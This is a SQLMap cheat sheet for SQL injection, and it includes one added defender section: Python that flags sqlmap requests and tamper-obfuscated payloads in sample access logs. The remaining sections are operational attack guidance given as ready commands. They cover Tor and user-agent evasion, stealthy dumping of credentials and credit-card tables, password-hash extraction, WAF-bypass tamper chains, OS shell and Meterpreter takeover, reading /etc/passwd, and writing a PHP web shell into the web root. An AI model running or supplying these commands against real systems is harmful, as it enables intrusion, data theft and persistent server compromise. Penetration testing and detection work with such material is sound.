SQLMap Advanced Cheat Sheet

Complete reference: From basic Injection to OS Takeover & WAF Bypass.

1. Authentication & Anonymity

Essential flags for connecting to secured targets or remaining hidden.

Request Files (The “Pro” Way)

Instead of typing long URLs, save the raw HTTP request from Burp Suite to a file (e.g., req.txt).

sqlmap -r req.txt --batch

Proxy & Tor (OpSec)

  • --tor: Route traffic through the default Tor network
  • --check-tor: Verify that the Tor exit IP is actually being used
  • --proxy="http://127.0.0.1:8080": Route through Burp Suite or another proxy
  • --random-agent: Use a random User-Agent (the default sqlmap User-Agent is commonly blocked)
  • --mobile: Imitate a smartphone User-Agent

Authentication

sqlmap -u "http://target.com" --auth-type=Basic --auth-cred="user:pass"
sqlmap -u "http://target.com" --cookie="PHPSESSID=a8d7s9…"

2. Database Enumeration

Mapping out the database structure before dumping data.

Basic Recon

  • --banner: Get version info
  • --current-user: Who are we?
  • --current-db: Where are we?
  • --is-dba: Do we have Admin rights?

Structure Mapping

  • --dbs: List all Databases
  • --tables: List Tables in DB
  • --columns: List Columns in Table
  • --schema: List DBMS schema

Deep Dive

  • --users: List all DB users
  • --passwords: Dump password hashes
  • --privileges: List user privileges
  • --roles: List user roles

3. Data Extraction

Targeted Dumping

Don’t dump the whole database! Be surgical to avoid detection.

sqlmap -u [URL] -D users_db -T accounts -C "username,password,email" --dump

Search for Specific Data

Great for finding tables containing “admin” or “credit_card” without listing everything.

sqlmap -r req.txt --search -C "password"
sqlmap -r req.txt --search -T "admin"

Filtering Dumps

sqlmap -u [URL] --dump -T users --where="id>50" --start=1 --stop=10

4. WAF Bypass (Tamper Scripts)

Use tamper scripts to obfuscate payloads and bypass Web Application Firewalls.

Common Tamper Combinations

  • General / Unknown: --tamper=between,randomcase,space2comment
  • MSSQL: --tamper=between,charencode,charunicodeencode
  • MySQL: --tamper=between,bluecoat,sp_password

Other Bypass Flags

  • --hpp: HTTP Parameter Pollution (splits payload across variables).
  • --delay=2: Slow down requests to avoid rate limiting.
  • --csrf-token="mytoken": Automatically handle anti-CSRF tokens.
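The tamper scripts listed above are exactly what a WAF rule or log-analysis job has to be resilient to, and the --random-agent flag from section 1 is why a User-Agent match alone is not enough. The following Python is an added, defender-side example and is not part of the original cheat sheet or of sqlmap itself. It walks constructed access-log lines (combined log format; the IPs, timestamps and requests are made up for this example), flags the default sqlmap User-Agent as a weak signal, and normalizes each query string before keyword matching: %uXXXX and %XX sequences are decoded (charunicodeencode, charencode), inline /**/ comments are replaced with spaces (space2comment), and case is folded (randomcase), so the "NOT BETWEEN" rewrite of the between tamper and a case-scrambled UNION SELECT are both caught. The signature names are labels chosen for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format) written for this example;
# they are not captured traffic.
#   lines 1-2: default sqlmap User-Agent, second one with a boolean payload
#   line 3:    randomcase + space2comment payload behind a browser User-Agent
#   line 4:    charunicodeencode-style payload with the between tamper applied
#   lines 5-6: benign requests (line 6 contains the word "union" legitimately)
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2025:13:55:36 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
203.0.113.7 - - [10/Oct/2025:13:55:37 +0000] "GET /item.php?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
198.51.100.9 - - [10/Oct/2025:13:56:01 +0000] "GET /item.php?id=1%2F**%2FuNiOn%2F**%2FsElEcT%2F**%2F1%2C2%2C3 HTTP/1.1" 200 640 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.9 - - [10/Oct/2025:13:56:02 +0000] "GET /item.php?id=1%u0020AND%u00201%u0020NOT%u0020BETWEEN%u00200%u0020AND%u00201 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.44 - - [10/Oct/2025:13:57:12 +0000] "GET /item.php?id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0)"
192.0.2.44 - - [10/Oct/2025:13:57:13 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows NT 10.0)"
"""

# Combined log format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# sqlmap's default User-Agent starts with "sqlmap/"; --random-agent and --mobile
# replace it, so treat this as a weak signal, never the only one.
DEFAULT_UA_RE = re.compile(r'^sqlmap/', re.IGNORECASE)

# Signature names are labels chosen for this example, not sqlmap terminology.
SQL_SIGNATURES = [
    ("union-select", re.compile(r'\bunion\s+(all\s+)?select\b')),
    ("boolean-tautology", re.compile(r'\b(and|or)\s+\d+\s*=\s*\d+')),
    ("between-tamper", re.compile(r'\bnot\s+between\s+\d+\s+and\s+\d+')),
    ("time-based", re.compile(r'\b(sleep|benchmark)\s*\(|\bwaitfor\s+delay\b')),
    ("file-or-os-access", re.compile(r'\b(xp_cmdshell|load_file|into\s+(out|dump)file)\b')),
]


def normalize_payload(raw: str) -> str:
    """Undo the encodings and obfuscations the tamper scripts above apply, so
    keyword matching sees roughly what the DBMS parser would see."""
    # charunicodeencode emits %uXXXX; decode those before the plain %XX pass
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), raw)
    # charencode emits %XX; '+' is a space in query strings
    s = unquote_plus(s)
    # space2comment uses /**/ in place of whitespace
    s = re.sub(r'/\*.*?\*/', ' ', s)
    # randomcase scrambles keyword case; fold it and collapse whitespace runs
    return re.sub(r'\s+', ' ', s).lower().strip()


def analyze_line(line: str):
    """Return (client_ip, [reasons]) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if DEFAULT_UA_RE.search(m['ua']):
        reasons.append("default-sqlmap-ua")
    path = m['path']
    query = path.split('?', 1)[1] if '?' in path else ''
    norm = normalize_payload(query)
    for name, rx in SQL_SIGNATURES:
        if rx.search(norm):
            reasons.append(name)
    return (m['ip'], reasons) if reasons else None


def analyze_log(text: str):
    """All suspicious hits in order, plus a per-client tally of them."""
    hits = [r for r in (analyze_line(l) for l in text.splitlines()) if r]
    per_ip = Counter(ip for ip, _ in hits)
    return hits, per_ip


if __name__ == "__main__":
    found, tally = analyze_log(SAMPLE_LOG)
    for ip, reasons in found:
        print(f"{ip}: {', '.join(reasons)}")
    print(dict(tally))
```

Running it on the constructed log reports both payloads from 198.51.100.9 even though the User-Agent looks like a browser, and leaves the "union station" search untouched. The per-client tally is the figure to alert on: a single hit may be a false positive, a run of them from one address is scanner behaviour.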

5. OS Takeover (Dangerous)

Requires DBA privileges. These commands write files to the server.

OS Shell

Get a command prompt on the server (via xp_cmdshell, or file upload).

sqlmap -u [URL] --os-shell

Metasploit Integration (OS Pwn)

Spawns a Meterpreter session automatically.

sqlmap -u [URL] --os-pwn --msf-path=/usr/share/metasploit-framework/

File System Access

sqlmap -u [URL] --file-read="/etc/passwd"
sqlmap -u [URL] --file-write="shell.php" --file-dest="/var/www/html/shell.php"

6. Advanced Injection Points

Custom Injection Point (*)

If SQLMap can’t find the parameter, or you want to inject into a URI or JSON, use the asterisk *.

URI Injection:

sqlmap -u "http://target.com/user/1*/profile"

JSON Injection (in -r file):

{"id": "1*", "name": "test"}

Force Technology

Save time if you already know the backend.

sqlmap -u [URL] --dbms=mysql
sqlmap -u [URL] --os=linux

7. Performance & Optimization

  • --threads=10: Increase concurrent requests (default: 1)
  • --null-connection: Get the page length without the body (saves bandwidth)
  • --keep-alive: Use persistent HTTP connections
  • --predict-output: Predict common query output (statistics tables, etc.)
  • -v 3: Show the actual payloads being sent
